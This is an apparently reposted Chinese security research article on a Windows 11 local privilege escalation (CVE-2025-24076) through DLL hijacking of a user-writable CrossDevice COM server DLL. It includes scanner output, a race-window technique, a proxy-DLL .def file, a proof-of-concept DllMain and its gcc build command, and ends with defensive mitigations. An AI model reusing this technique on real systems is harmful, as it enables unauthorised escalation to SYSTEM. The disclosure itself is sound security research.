在网络安全的广阔领域中,渗透测试专家如同数字世界的侦探,不断寻找隐藏在系统深处的漏洞——它们或许在不经意间,为攻击者打开了通往高权限的大门。
-
CVE-2025-24076:允许攻击者通过DLL劫持,从普通用户权限提升至 SYSTEM。 -
CVE-2025-24994:辅助性漏洞,涉及用户进程的DLL验证机制缺陷。
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃┃ NAME ┃ COM server image file permissions ┃┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫┃ Check whether the current user has any modification rights ┃┃ on a COM server module file. This may not necessarily result┃┃ in a privilege escalation. Further analysis is required. ┃┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛[*] Status: Vulnerable - MediumId : {E9F83CF2-E0C0-4CA7-AF01-E90C70BEF496}Path : HKLMSOFTWAREClassesCLSID{E9F83CF2-E0C0-4CA7-AF01-E90C70BEF496}Value : InProcServer32Data : %PROGRAMDATA%CrossDeviceCrossDevice.Streaming.Source.dllDataType : FilePathModifiablePath : C:ProgramDataIdentityReference : VORDEFINIERTBenutzerPermissions : WriteAttributes, AddSubdirectory, WriteExtendedAttributes, AddFile
C:ProgramData)。进一步分析发现,加载该DLL的进程并未校验其数字签名。于是作者就遇到了CVE-2025-24076:
-
高权限进程加载未签名验证的DLL。 -
用户拥有对该DLL的写权限。
GetFileVersionInfoExW函数。在DLL加载前,该函数会尝试读取版本信息。具体实现步骤如下:
GetFileVersionInfoExW调用;通过这种方式,作者避免了依赖毫秒级时间窗口的不可靠性,显著提升了漏洞利用的稳定性和可控性。
DllCanUnloadNow和DllGetClassObject;定义文件(.def)如下:
EXPORTSDllCanUnloadNow=target_original.DllCanUnloadNow @1DllGetClassObject=target_original.DllGetClassObject @2#include<windows.h>BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){if (ul_reason_for_call == DLL_PROCESS_ATTACH) { system("whoami >> C:\poc_only_admin_can_write_to_c.txt"); }return TRUE;}gcc -shared -o poc.dll malicious.c malicious.def
C:以验证提权成功。
-
使用端点检测与响应(EDR)系统,及时发现异常行为; -
部署文件完整性监控(FIM),防止关键路径被非法篡改; -
对COM组件路径进行定期审核,避免用户可写路径加载DLL; -
关注安全情报,识别异常指标并迅速响应。
原文始发于微信公众号(山石网科安全技术研究院):揭秘如何在Windows 11中300毫秒内获取管理员权限
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论